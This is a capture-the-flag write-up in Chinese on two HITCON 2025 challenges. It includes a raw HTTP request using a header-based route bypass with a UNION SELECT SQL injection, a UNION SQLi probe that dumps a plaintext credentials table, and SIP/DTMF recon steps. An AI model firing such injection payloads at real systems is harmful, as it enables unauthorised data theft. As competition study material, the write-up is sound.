HITCON 2025 CTF Exhibition WriteUp

2025/11/3 InfoSec 心得 CTF Writeup HITCON

上大學後忙到沒時間寫 WP 了，這次簡單紀錄一下有打的題目，應該不會寫太細。
以及感謝 ICEDTEA 的各位，大家都超扛 ouob
ICEDTEA

Silent Sync

Silent Sync
Since a hacker infiltrated our internal system last month, the administrator page has been inaccessible, and it appears that he may have modified or added something to it.

http://34.81.111.22:8000

dist.zip

Author: 10F

主要兩個點，第一個是前面最中間件繞過，繞過中間件後，再打一個 SQLi 就好。
直接丟封包

POST /post HTTP/1.1
Host: 34.81.111.22:8000
Accept-Language: zh-TW,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://34.81.111.22:8000/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Expect: 100-continue
Content-Type: application/x-www-form-urlencoded
Content-Length: 86

X-Internal-Route: /search?q=' UNION SELECT secret_data, null, null FROM secrets --

Flag: hitcon{y0u_4re_pwner_m4s7er_reques7_smugg1ing_4nd_d0ub1e_sq1i}

【HITCON University “SIP” System Challenge】

HITCON 大學最近部署了一套新的系統，結合多種新興技術，傳聞只要能成功接通校長的分機，直通天聽，就能獲得學校隱藏的終極機密。

https://sip.h1tc0n.xyz/

Good luck, hacker!

請注意，本題 Flag 均為小寫字母。
Author: Blue Goblin

線索 1 (Thanks soar)

https://sip.h1tc0n.xyz/ 有網站，但不是重點
https://sip.h1tc0n.xyz/contacts 有可以查詢的頁面，可以被 SQLi
' union select NULL, NULL, NULL, NULL;--#
可以查到帳密表

+----+----------------------------------------+------------+
| id | password                               | username   |
+----+----------------------------------------+------------+
| 1  | xD2$4Et@PQ1J                           | admin      |
| 2  | xD2$4Et@PQJ                            | user       |
| 3  | x2$4Et@PQJ                             | student    |
| 4  | aT1^@k8wm^f*                           | student001 |
| 5  | HITCON{G00D_Mo4ning_R1ght_N0W_you_c4N} | flag       |
| 6  | 4815                                   | DTMF       |
+----+----------------------------------------+------------+

恩，那個是 FAKE_FLAG。

線索 2

然後可以用 DNS SRV Record，找到真正的 SIP Server
_sip._udp.h1tc0n.xyz，指向 you-know-gcp-port-not-open.so-i-use-my-vps.h1tc0n.xyz，Port UDP 5060
you-know-gcp-port-not-open.so-i-use-my-vps.h1tc0n.xyz IP 解析為 160.30.98.143

線索 3

https://sip.h1tc0n.xyz/dial?user=
網站有提示可以不用帳號直撥 SIP 地址，結合 線索 1 有個 DTMF，代表是 4815，通靈是分機號碼。
直撥：sip:4815@160.30.98.143

線索 4

打進去後，自動語音系統有幾個模式：

1: 直撥分機 -> 服務不能用
2: 支援熱線 -> 還是不能用
3: 語音留言 -> 還是 *N 不能用
*: 神奇模式 -> 會叫你答題

線索 5 (Thanks WH)

第一題：2 的次方，且要四位數？反正我打 1024 過了。
第二題：RSA 破譯，但是 RSA 的資料用 DTMF 編碼，按鍵 12345 取得語音，9 回答答案，0 重聽。
- 拆分後：3233*17*2790*#1000 2111 3222 4333
  反正全部丟給鯨魚，他就給出答案 65，輸入回去，然後就開始念 Flag ㄌ。
Flag: hitcon{r542_h011d4y}

LOADING